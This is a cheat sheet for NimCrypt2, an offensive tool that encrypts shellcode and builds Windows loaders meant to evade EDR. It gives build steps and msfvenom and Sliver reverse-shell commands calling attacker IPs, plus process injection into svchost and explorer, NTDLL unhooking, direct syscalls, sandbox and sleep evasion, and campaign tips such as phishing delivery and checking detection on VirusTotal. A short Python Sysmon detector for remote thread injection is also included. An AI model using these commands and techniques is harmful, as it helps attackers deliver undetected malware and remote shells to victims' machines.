
NimCrypt2

NimCrypt2 is a post-exploitation framework written in Nim that encrypts shellcode and packs PE files with multiple evasion techniques including AES encryption, direct syscalls, NTDLL unhooking, and sandbox detection. It’s designed to bypass EDR solutions and deliver payloads undetected on Windows systems.

Install Nim compiler and build tools:

```shell
# On Windows with Chocolatey
choco install nim mingw

# On macOS with Homebrew
brew install nim

# On Linux, use your package manager or download from nim-lang.org
apt-get install nim gcc mingw-w64
```

```shell
# Clone the NimCrypt2 repository
git clone https://github.com/icyguider/NimCrypt2.git
cd NimCrypt2

# Install Nim dependencies via nimble
nimble install -d

# Build the tool
nim c -d:release src/NimCrypt2.nim
# Output: NimCrypt2.exe in current directory
```

```shell
# Debug build (faster compilation, larger binary)
nim c -d:debug src/NimCrypt2.nim

# Release build (optimized, smaller binary, slower to compile)
nim c -d:release --opt:size src/NimCrypt2.nim

# Cross-compile for x64 from x86 build
nim c -d:release --cpu:amd64 src/NimCrypt2.nim
```

```shell
# Encrypt shellcode and create loader executable
NimCrypt2.exe -f shellcode.bin -o output.exe

# With all evasion techniques enabled
NimCrypt2.exe -f shellcode.bin -o output.exe -e AES -u -s -sleep 5000
```

Create shellcode payloads from various frameworks:

```shell
# Metasploit Framework
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f raw -o shellcode.bin

# CobaltStrike aggressor script output to file
# beacon> rportfwd [port] [ip] [port]
# Save beacon shellcode as SC.bin

# Sliver C2 (open-source Cobalt Strike alternative)
sliver > generate --mtls 192.168.1.100:8888 --save-to shellcode.bin
```
| Option | Purpose | Example |
|---|---|---|
| `-f <file>` | Path to raw shellcode file (required) | `-f payload.bin` |
| `-t <process>` | Target process name for injection | `-t svchost.exe` |
| `-r` | Enable remote thread injection | `-r` |
| `-m <addr>` | Manual base address override | `-m 0x140000000` |
```shell
# From Metasploit
NimCrypt2.exe -f meterpreter.bin -o loader.exe

# From CobaltStrike (stageless)
NimCrypt2.exe -f beacon.bin -o stager.exe -t explorer.exe

# From manual shellcode dump
NimCrypt2.exe -f custom_payload.bin -o custom.exe
```

```shell
# Default AES-CTR encryption
NimCrypt2.exe -f shellcode.bin -o output.exe -e AES

# AES with custom key (auto-generated if not specified)
# Key is embedded in compiled binary automatically
NimCrypt2.exe -f shellcode.bin -o output.exe -e AES -k 32
```

```shell
# XOR encryption (faster, smaller file)
NimCrypt2.exe -f shellcode.bin -o output.exe -e XOR

# Multi-pass XOR
NimCrypt2.exe -f shellcode.bin -o output.exe -e XOR -k 4
```
```nim
# Nim code for custom key generation (advanced)
import nimcrypto/sysrand  # randomBytes(): OS-backed CSPRNG

# newSeq[byte](32) alone yields an all-zero key; fill it from the OS CSPRNG.
var key = newSeq[byte](32)
if randomBytes(key) != key.len:
  quit("could not obtain random bytes for the key")
# Key automatically embedded during compilation
```
```shell
# Inject into current process
NimCrypt2.exe -f shellcode.bin -o output.exe

# Allocate memory, write shellcode, execute
# Uses NtAllocateVirtualMemory → NtWriteVirtualMemory → NtCreateThreadEx
```

```shell
# Inject into remote process (e.g., explorer.exe)
NimCrypt2.exe -f shellcode.bin -o output.exe -t explorer.exe

# Inject with specific target by PID (if supported)
NimCrypt2.exe -f shellcode.bin -o output.exe -t 1234
```

```shell
# Create remote thread in target process
NimCrypt2.exe -f shellcode.bin -o output.exe -t svchost.exe -r

# Execution flow:
# 1. Open target process handle
# 2. Allocate RWX memory remotely
# 3. Write encrypted shellcode
# 4. Decrypt in-memory
# 5. Create remote thread pointing to shellcode
```

```shell
# Replace legitimate process image (if supported in build)
NimCrypt2.exe -f shellcode.bin -o output.exe -t notepad.exe -hollow
```
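As a defender-side illustration of the execution flow above (added here, not part of NimCrypt2), the following Python correlates Sysmon-style ProcessAccess (Event ID 10) and CreateRemoteThread (Event ID 8) records over a constructed sample: an alert fires when one process opens a watched target with thread-creation and memory-write rights and then starts a remote thread whose start address is not backed by any loaded module. The keys `src`, `tgt`, `access` and `start_module` are this example's shorthand for Sysmon's SourceImage, TargetImage, GrantedAccess and StartModule fields.

```python
from collections import defaultdict

# Windows process access rights the remote-injection flow needs (real constants).
PROCESS_CREATE_THREAD = 0x0002
PROCESS_VM_OPERATION = 0x0008
PROCESS_VM_WRITE = 0x0020
INJECTION_RIGHTS = PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE

# Injection targets named on this page; compared case-insensitively by file name.
WATCHED_TARGETS = {"svchost.exe", "explorer.exe", "notepad.exe"}

# Constructed sample telemetry shaped like Sysmon Event ID 10 and Event ID 8.
# Paths, PIDs and ordering are made up for the example.
SAMPLE_EVENTS = [
    {"id": 10, "src": r"C:\Users\u\Downloads\final.exe", "src_pid": 4321,
     "tgt": r"C:\Windows\System32\svchost.exe", "tgt_pid": 812, "access": 0x1FFFFF},
    {"id": 8, "src": r"C:\Users\u\Downloads\final.exe", "src_pid": 4321,
     "tgt": r"C:\Windows\System32\svchost.exe", "tgt_pid": 812, "start_module": ""},
    # Benign: Task Manager opens svchost with a query-only right, no thread follows.
    {"id": 10, "src": r"C:\Windows\System32\Taskmgr.exe", "src_pid": 2200,
     "tgt": r"C:\Windows\System32\svchost.exe", "tgt_pid": 812, "access": 0x1000},
    # Benign: a remote thread whose start address lies inside a loaded module.
    {"id": 8, "src": r"C:\Windows\System32\csrss.exe", "src_pid": 600,
     "tgt": r"C:\Windows\explorer.exe", "tgt_pid": 4000,
     "start_module": r"C:\Windows\System32\ntdll.dll"},
]


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def detect_remote_injection(events):
    """Return one alert per (source PID, target PID) pair that shows a
    ProcessAccess granting INJECTION_RIGHTS followed by a CreateRemoteThread
    with an empty StartModule (thread starts in unbacked memory) in a watched target."""
    granted = defaultdict(int)  # (src_pid, tgt_pid) -> OR of access masks seen so far
    alerts = []
    for ev in events:
        key = (ev["src_pid"], ev["tgt_pid"])
        if ev["id"] == 10:
            granted[key] |= ev["access"]
        elif ev["id"] == 8:
            has_rights = (granted[key] & INJECTION_RIGHTS) == INJECTION_RIGHTS
            unbacked = not ev.get("start_module")
            if has_rights and unbacked and basename(ev["tgt"]) in WATCHED_TARGETS:
                alerts.append({"source": ev["src"], "source_pid": ev["src_pid"],
                               "target": basename(ev["tgt"]), "target_pid": ev["tgt_pid"]})
    return alerts
```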

NimCrypt2 uses direct syscall invocation to bypass EDR hooks:

```shell
# Core syscalls utilized by NimCrypt2:
# NtAllocateVirtualMemory - allocate executable memory
# NtWriteVirtualMemory - write shellcode to memory
# NtCreateThreadEx - create execution thread
# NtProtectVirtualMemory - change memory protection flags
# NtQueryVirtualMemory - query memory properties
# Compiled directly into binary with no IAT entries
# EDRs cannot hook what doesn't appear in import tables

# Syscalls dynamically resolved at runtime via SSN (Syscall Service Number)
# Survives NTDLL instrumentation and hooking attempts
# Generated executable contains NO standard Windows API imports
# GetProcAddress/LoadLibrary calls eliminated
# All syscalls embedded directly in compiled Nim code
```
```shell
# Replace hooked NTDLL with clean copy from disk
NimCrypt2.exe -f shellcode.bin -o output.exe -u

# Process:
# 1. Load NTDLL from disk into new section
# 2. Replace in-memory NTDLL with disk copy
# 3. Bypass EDR kernel callbacks
# 4. Execute via clean syscall stubs
```
```nim
# Check if NTDLL is hooked (in generated code)
proc isHooked(fnAddr: pointer): bool =
  ## `addr` is a Nim keyword, so the parameter is named fnAddr.
  ## Examine the first byte of the function: an inline hook patches in a
  ## JMP rel32 (0xE9) or CALL rel32 (0xE8); returns true when one is found.
  let code = cast[ptr UncheckedArray[byte]](fnAddr)
  result = code[0] in {0xE9'u8, 0xE8'u8}
```
```shell
# Activate all sandbox checks before execution
NimCrypt2.exe -f shellcode.bin -o output.exe -s

# Checks performed:
# - Domain join status (skip if workgroup)
# - Processor core count (fail if < 2)
# - Physical memory (fail if < 4GB)
# - Username anomalies (skip if "WDAGUtility" or "Guest")
# - Registry artifacts (Hyper-V, VMware, VirtualBox)
# - Disk size checks (fail if < 30GB)
```

```shell
# Domain check only
NimCrypt2.exe -f shellcode.bin -o output.exe -sandbox-domain

# Memory check only
NimCrypt2.exe -f shellcode.bin -o output.exe -sandbox-memory

# Username check only
NimCrypt2.exe -f shellcode.bin -o output.exe -sandbox-user
```
```nim
# Example check (pseudo-code; only the core-count call is real Nim)
import std/cpuinfo  # countProcessors()

if countProcessors() < 2:
  quit()  # Exit if fewer than 2 cores (likely VM)

# Nim's own getTotalMemory() reports the GC heap, not physical RAM, so the
# loader has to ask the OS for this value (e.g. GlobalMemoryStatusEx on Windows).
if physicalMemoryBytes() < 4 * 1024 * 1024 * 1024:  # pseudo-code: OS query
  quit()  # Exit if less than 4GB RAM
```
```shell
# Sleep 5 seconds before executing shellcode
NimCrypt2.exe -f shellcode.bin -o output.exe -sleep 5000

# Measured in milliseconds
# 1000 = 1 second, 60000 = 1 minute
NimCrypt2.exe -f shellcode.bin -o output.exe -sleep 30000
```

Defeats automated malware analysis by delaying execution:

```shell
# Sleep through detection window in sandbox
# 30-60 second delay bypasses typical 10-20s analysis timeout
NimCrypt2.exe -f shellcode.bin -o output.exe -sleep 60000 -u -s
```
```shell
# Generate standalone EXE (default)
NimCrypt2.exe -f shellcode.bin -o payload.exe

# Generate DLL (if supported)
NimCrypt2.exe -f shellcode.bin -o payload.dll -format dll

# Generate reflective DLL
NimCrypt2.exe -f shellcode.bin -o payload.dll -format reflective
```

```shell
# Specify output directory
NimCrypt2.exe -f shellcode.bin -o C:\temp\loader.exe

# Output with custom entrypoint name
NimCrypt2.exe -f shellcode.bin -o output.exe -entry main
```
```shell
# Generate Meterpreter shellcode
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f raw -o meter.bin

# Encrypt and pack with NimCrypt2
NimCrypt2.exe -f meter.bin -o agent.exe -e AES -u -s -sleep 5000

# Execute on target
# agent.exe → connects to 10.10.10.10:4444
```

```shell
# Export beacon from CobaltStrike as raw shellcode
# Artifact Kit → set format to "raw"

# Process with NimCrypt2
NimCrypt2.exe -f beacon.bin -o evasive_beacon.exe -e AES -u -t svchost.exe -r

# Deliver via initial access method
# Phishing → payload.exe → reverse shell
```

```shell
# Generate Sliver implant
sliver > generate --mtls 192.168.1.100:8888

# Extract shellcode
# sliver > generate --save-to sliver.bin --format shellcode

# Package with NimCrypt2
NimCrypt2.exe -f sliver.bin -o sliver_loader.exe -e AES -u -s
```

```shell
# Convert BOF to shellcode first
# BOF → shellcode conversion tool required

NimCrypt2.exe -f bof_payload.bin -o bof_loader.exe -r -t explorer.exe
```
| Issue | Cause | Solution |
|---|---|---|
| "Invalid shellcode file" | File doesn't exist or wrong path | Verify file path and use absolute paths |
| Compilation errors | Nim not installed | Run `choco install nim` or use package manager |
| EDR still detecting | Evasion techniques inactive | Use `-e AES -u -s -sleep 5000` flags together |
| "Sandbox detected" | Running in VM | Test on bare-metal machine or disable `-s` flag |
| Output EXE won't execute | Shellcode format incorrect | Verify shellcode with `msfvenom -p windows/x64/shell_reverse_tcp` |
| NTDLL unhooking fails | System DLL corrupted | Run on patched system or skip `-u` flag |
| Process injection timeout | Target process terminating | Use more stable target like svchost.exe |
```shell
# "nim: command not found"
# Solution: Add Nim to PATH or reinstall

# "error: undeclared identifier"
# Solution: Run 'nimble install -d' to fetch missing dependencies

# "compilation hangs"
# Solution: May be normal for release builds - wait 10-30 minutes
```
  • Always test payloads in isolated lab environment first
  • Use different encryption keys for each campaign
  • Rotate shellcode generators between operations
  • Implement sleep obfuscation in all production payloads
  • Combine NTDLL unhooking with direct syscalls for maximum evasion
  • Never run generated payloads on your own machine
```shell
# Layer multiple evasion techniques
NimCrypt2.exe -f shellcode.bin -o final.exe \
  -e AES \
  -u \
  -s \
  -sleep 15000 \
  -t svchost.exe \
  -r
```
  • Vary command-line arguments between campaigns
  • Randomize sleep duration (avoid predictable patterns)
  • Use process injection into legitimate Windows processes
  • Implement junk code and string obfuscation at Nim level
  • Monitor your tool’s detection rate on VirusTotal
```shell
# Verify shellcode format before packing
file shellcode.bin  # Should be "data"

# Test on isolated VM with AV disabled first
# Then test with real EDR products installed

# Verify execution with Wireshark or netcat listener
nc -lvnp 4444  # Wait for reverse shell callback
```
| Tool | Purpose | Comparison |
|---|---|---|
| ScareCrow | Shellcode loader with IAT/syscall obfuscation | Similar evasion, older maintenance |
| Freeze | Process image encryption and obfuscation | More obfuscation, less flexible injection |
| PEzor | PE packer with NTDLL unhooking | Bash-based, similar feature set |
| Donut | In-memory .NET assembly loader | For .NET payloads, different use case |
| shhhloader | Shellcode loader with advanced obfuscation | Newer project, similar goals |
| Themida/WinLicense | Commercial PE packer | Professional-grade, cost-prohibitive |
| ConfuserEx | .NET obfuscator | For managed code only |
  • NimCrypt2: Flexible shellcode encryption with direct syscall support
  • ScareCrow: Legacy campaigns, simpler requirements
  • Freeze: Maximum obfuscation for long-running implants
  • PEzor: Bash-compatible build pipelines
  • Donut: When payload is .NET executable or PowerShell